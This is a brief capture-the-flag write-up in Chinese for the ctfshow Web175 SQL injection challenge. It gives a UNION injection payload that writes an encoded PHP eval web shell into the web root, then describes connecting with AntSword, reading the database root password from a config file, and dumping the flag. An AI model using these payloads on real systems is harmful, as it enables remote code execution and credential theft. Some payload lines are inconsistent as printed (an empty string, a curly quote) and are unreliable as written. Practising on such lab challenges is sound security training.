ctfshow SQL注入Web175

查询语句
//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user5 where username !='flag' and id = '".$_GET['id']."' limit 1;";
返回逻辑
//检查结果是否有flag
    if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }

Playload：

-1' union select 1,"" into outfile'/var/www/html/1.php

的base64编码

PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+

PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+的Url编码

%50%44%39%77%61%48%41%67%5a%58%5a%68%62%43%67%6b%58%31%42%50%55%31%52%62%4d%56%30%70%4f%7a%38%2b

用这个替换掉

playload：

-1' union select 1,from_base64(”%50%44%39%77%61%48%41%67%5a%58%5a%68%62%43%67%6b%58%31%42%50%55%31%52%62%4d%56%30%70%4f%7a%38%2b
”)into outfile'/var/www/html/1.php

 

用蚁剑链接这个网站

在/var/www/html/api/config.php找到mysql的root的密码

 为root

右击数据操作

点击ctfshow_user5表格再点击执行 

得到flag

ctfshow{9dfffc28-4471-41cc-a210-be9c97cdd76a}